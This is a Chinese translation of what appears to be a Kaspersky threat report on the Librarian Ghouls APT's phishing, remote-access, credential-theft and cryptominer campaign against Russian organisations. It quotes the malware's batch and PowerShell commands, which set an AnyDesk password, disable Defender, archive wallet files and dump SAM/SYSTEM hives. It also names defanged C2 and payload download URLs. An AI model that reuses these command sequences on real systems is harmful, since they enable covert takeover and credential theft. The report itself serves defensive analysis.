引言

Librarian Ghouls，也称为“Rare Werewolf”和“Rezet”，是一个针对俄罗斯和独联体国家实体的APT组织。其他安全厂商也在监控该APT并发布其活动分析。该组织在2025年5月期间持续活跃，不断攻击俄罗斯公司。

该威胁的一个显著特点是攻击者倾向于使用合法的第三方软件，而非开发自己的恶意二进制文件。本文描述的活动的恶意功能通过命令文件和PowerShell脚本实现。攻击者建立对受害者设备的远程访问、窃取凭据，并在系统中部署XMRig加密货币挖矿程序。

我们的研究发现了该APT组织武器库中的新工具，本文将详细阐述。

技术细节

初始感染向量

Librarian Ghouls的攻击在2024年几乎持续不断。我们观察到该组织活动在12月略有下降，随后立即出现新一轮攻击，且仍在进行中。该组织的主要初始感染向量涉及包含带可执行文件的密码保护存档的定向网络钓鱼电子邮件。这些恶意电子邮件通常伪装成来自合法组织的消息，包含看似官方文档的附件。感染过程如下：受害者打开附加的存档（密码通常在电子邮件正文中提供），提取内部文件并打开它们。

我们获取了一个伪装成付款订单的存档中的恶意植入程序。该样本是一个使用Windows的Smart Install Maker实用程序制作的自解压安装程序。

安装程序包含三个文件：一个存档、一个配置文件和一个与我们的分析无关的空文件。它们随后分别重命名为data.cab、installer.config和runtime.cab。

主要的恶意逻辑位于安装程序的配置文件中。它使用各种注册表修改命令自动将合法的窗口管理器4t Tray Minimizer部署到系统上。该软件可以将运行的应用程序最小化到系统托盘，允许攻击者掩盖其在受感染系统上的存在。

一旦安装了4t Tray Minimizer，安装程序就从data.cab中提取三个文件并将其放入C:\Intel目录，具体位置为：

PDF诱饵类似于支付小额款项的订单：

rezet.cmd

一旦data.cab解压，安装程序生成并执行一个rezet.cmd命令文件，该文件随后连接到C2服务器downdown[.]ru，托管六个带有JPG扩展名的文件。rezet.cmd将这些文件下载到C:\Intel，将其文件扩展名更改为：driver.exe、blat.exe、svchost.exe、Trays.rar、wol.ps1和dc.exe。

driver.exe是rar.exe的自定义构建版本，即WinRAR 3.80的控制台版本。此版本已移除用户对话框字符串：它可以执行命令但不向控制台提供有意义的输出。 blat.exe是Blat，一个用于通过SMTP发送电子邮件消息和文件的合法实用程序。攻击者使用此程序将窃取的数据发送到他们控制的电子邮件服务器。 svchost.exe是远程访问应用程序AnyDesk。攻击者使用此程序远程控制受感染的机器。 dc.exe是Defender Control，允许禁用Windows Defender。

下载文件后，脚本使用指定的密码和driver.exe控制台实用程序将Trays.rar解压到相同的C:\Intel目录，并运行解压后的Trays.lnk。此快捷方式允许启动4t Tray Minimizer并最小化到托盘。

接下来，脚本在受感染的设备上安装AnyDesk，并从C2服务器下载bat.bat文件到C:\Intel\AnyDesk。最后，rezet.cmd运行之前从data.cab中提取的bat.lnk。

bat.bat

打开bat.lnk快捷方式会运行bat.bat批处理文件，该文件执行一系列恶意操作。

禁用安全措施和计划任务

首先，BAT文件为AnyDesk设置密码QWERTY1234566，允许攻击者在无需确认的情况下连接到受害者的设备。

接下来，脚本使用之前下载的Defender Control（dc.exe）应用程序禁用Windows Defender。

为了验证受害者的计算机已开启并可用于远程连接，批处理文件运行powercfg实用程序六次，每次使用不同的参数。此实用程序控制本地机器的电源设置。

接下来，bat.bat运行schtasks实用程序创建一个名为ShutdownAt5AM的计划任务，该任务每天凌晨5点关闭受害者的PC。我们评估认为，攻击者使用此技术掩盖其踪迹，使用户 unaware 其设备已被劫持。

1
2
3
4
5
6
7
8
9

echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access
%SYSTEMDRIVE%\Intel\dc.exe /D
powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
powercfg -change -standby-timeout-ac 0
powercfg -change -hibernate-timeout-ac 0
powercfg -h off
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00

bat.bat中禁用安全措施和电源管理配置

唤醒脚本和数据窃取

接下来，批处理文件通过PowerShell执行wol.ps1脚本。

1
2
3
4
5
6
7

$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
$Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
$Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
# 创建任务设置
$TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
# 在任务计划程序中注册任务
Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force

“wol.ps1”脚本的内容

此脚本每天凌晨1点启动Microsoft Edge。我们没有发现msedge.exe被替换或受损的证据，因此我们相信它是真正的Microsoft Edge可执行文件。此每日浏览器激活会唤醒受害者的计算机，为攻击者提供一个四小时的时间窗口，在计划任务于凌晨5点关闭机器之前，通过AnyDesk建立未经授权的远程访问。

执行PowerShell脚本后，bat.bat移除curl实用程序、Trays.rar存档和AnyDesk安装程序。攻击者不再需要这些组件：在感染的此阶段，所有必要的恶意文件和第三方实用程序已通过curl下载，Trays.rar已解压，AnyDesk已安装在设备上。

之后，批处理文件为Blat设置环境变量。这些变量包含，除其他外，受害者数据将发送到的电子邮件地址以及这些帐户的密码。

下一步是收集设备上存储的令攻击者感兴趣的信息：

• 加密货币钱包凭据和种子短语
• 使用reg.exe制作的HKLM\SAM和HKLM\SYSTEM注册表键的转储

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*парол*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*карт*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*кошельк*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\wallet.dat /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*wallet*.doc* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*wallet*.txt /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*seed*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\keystore.json /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*bitcoin*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*usdt*.* /y
%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*ethereum*.* /y
reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup

bat.bat的数据收集

BAT文件使用driver.exe将其收集的数据打包成两个单独的密码保护存档。然后，脚本运行blat.exe通过SMTP将受害者的数据和AnyDesk配置文件发送给攻击者。

挖矿程序安装和自删除

接下来，bat.bat从C:\Intel\文件夹中删除攻击期间生成的文件，并在受感染的系统上安装加密货币挖矿程序。为此，脚本创建一个包含挖矿池地址和攻击者标识符的bm.json配置文件，然后从hxxp://bmapps[.]org/bmcontrol/win64/Install.exe下载install.exe。

install.exe是一个安装程序，检查系统中的JSON配置文件和bmcontrol.exe进程。如果检测到该进程，安装程序会终止它。

然后，install.exe从hxxps://bmapps[.]org/bmcontrol/win64/app-1.4.zip下载一个包含挖矿工具的存档。

该存档包含以下文件：

• _install.exe：安装程序的新版本。虽然我们分析的攻击中的样本是相同的，但我们怀疑攻击者有一个更新恶意软件的方案。
• bmcontrol.exe：挖矿控制器
• run.exe、stop.cmd、uninstall.cmd：用于启动、停止和移除控制器的工具
• XMRig挖矿程序

根据JSON文件的参数，使用未修改的原始安装程序文件，或将_install.exe重命名为install.exe并运行。之后，安装程序将run.exe添加到自动启动。此实用程序检查受感染系统上是否已有运行的bmcontrol.exe控制器，如果未找到，则从下载的存档中运行它。

一旦运行，bmcontrol.exe创建两个进程：master和worker。master进程启动并持续监控worker，并在后者意外退出时重新启动它。此外，master将JSON配置文件传递给worker进程。

在启动XMRig挖矿程序之前，worker进程收集以下系统信息：

• 可用的CPU核心
• 可用的RAM
• GPU

此数据用于在受感染的设备上配置挖矿程序，并发送到攻击者的服务器。当XMRig运行时，worker维持与挖矿池的连接，每60秒发送一次请求。

在系统上安装挖矿程序后，bat.bat从受害者的设备中移除自身。

攻击者使用的合法软件

利用第三方合法软件用于恶意目的（T1588.002）是一种常见技术，这使得检测和归因APT活动更加困难。我们在各种APT组织的当前活动中看到了这种模式，特别是在Likho集群中。

除了上述实用程序外，我们还在Librarian Ghouls攻击中识别出以下软件：

• Mipko Personal Monitor：一种DLP系统，攻击者用于监控受害者。该应用程序可以收集屏幕截图和记录击键等。
• WebBrowserPassView：一种密码恢复实用程序，可以提取存储在Web浏览器中的密码。攻击者使用此程序窃取受害者的凭据。
• ngrok：一个全局反向代理，用于保护和加速网络服务。攻击者使用此程序连接到目标机器。
• NirCmd：一种合法的实用程序，便于在没有可见用户界面的情况下执行各种OS任务。攻击者使用此程序隐蔽地运行脚本和可执行文件。

网络钓鱼活动

我们的调查揭示了几个我们评估为与正在进行的Librarian Ghouls活动相关的域名，置信度较低。在调查时，其中一些仍然活跃，包括users-mail[.]ru和deauthorization[.]online。这些域名托管了使用PHP脚本生成的网络钓鱼页面，旨在获取mail.ru电子邮件服务的凭据。

基础设施

本文详述的植入程序与命令和控制服务器downdown[.]ru和dragonfires[.]ru通信。两者都解析到IP地址185.125.51[.]5。

我们对攻击者基础设施的分析揭示了一个显著特征：与此活动相关的几个恶意Web服务器启用了目录列表，允许我们检查它们存储的文件。

受害者

我们的遥测数据表明，在调查期间，数百名俄罗斯用户成为此活动的受害者。它主要关注工业企业，工程学校也是感兴趣的目标。此外，所述攻击还影响了白俄罗斯和哈萨克斯坦的用户。

网络钓鱼电子邮件明显用俄语撰写，并包含带有俄语文件名的存档以及俄语诱饵文档。这表明此活动的主要目标可能基于俄罗斯或讲俄语。

关于攻击者

Librarian Ghouls APT表现出通常与黑客行动主义团体相关的特征，例如使用自解压存档和依赖合法的第三方实用程序而非自定义构建的恶意软件二进制模块。

自2024年12月当前活动开始以来，我们看到了植入程序的频繁更新，这些更新在配置文件和捆绑的合法实用程序集方面有所不同。在发布本文时，我们的数据涵盖了与此活动相关的100多个恶意文件。

要点

在发布本报告时，其中描述的Librarian Ghouls APT活动仍然活跃，正如我们在2025年5月观察到的攻击所证明的那样。与之前的活动一致，攻击者利用第三方合法实用程序而非开发自定义工具。所有恶意功能仍然依赖于安装程序、命令和PowerShell脚本。我们观察到攻击者不断改进其策略，不仅包括数据渗出，还包括部署远程访问工具和使用网络钓鱼站点进行电子邮件帐户入侵。我们不断监控此威胁行为者，并将继续分享其活动的最新信息。

危害指标（IOC）

• 额外的危害指标和用于检测Librarian Ghouls活动的YARA规则可供我们的APT情报报告服务客户使用。有关更多详情，请联系intelreports@kaspersky.com。

植入程序

d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68 2f3d67740bb7587ff70cc7319e9fe5c517c0e55345bf53e01b3019e415ff098b de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617 785a5b92bb8c9dbf52cfda1b28f0ac7db8ead4ec3a37cfd6470605d945ade40e c79413ef4088b3a39fe8c7d68d2639cc69f88b10429e59dd0b4177f6b2a92351 53fd5984c4f6551b2c1059835ea9ca6d0342d886ba7034835db2a1dd3f8f5b04

植入程序配置文件

f8c80bbecbfb38f252943ee6beec98edc93cd734ec70ccd2565ab1c4db5f072f 4d590a9640093bbda21597233b400b037278366660ba2c3128795bc85d35be72 1b409644e86559e56add5a65552785750cd36d60745afde448cce7f6f3f09a06 7c4a99382dbbd7b5aaa62af0ccff68aecdde2319560bbfdaf76132b0506ab68a 702bf51811281aad78e6ca767586eba4b4c3a43743f8b8e56bb93bc349cb6090 311ec9208f5fe3f22733fca1e6388ea9c0327be0836c955d2cf6a22317d4bdca

恶意存档附件

fd58900ea22b38bad2ef3d1b8b74f5c7023b8ca8a5b69f88cfbfe28b2c585baf e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86 6954eaed33a9d0cf7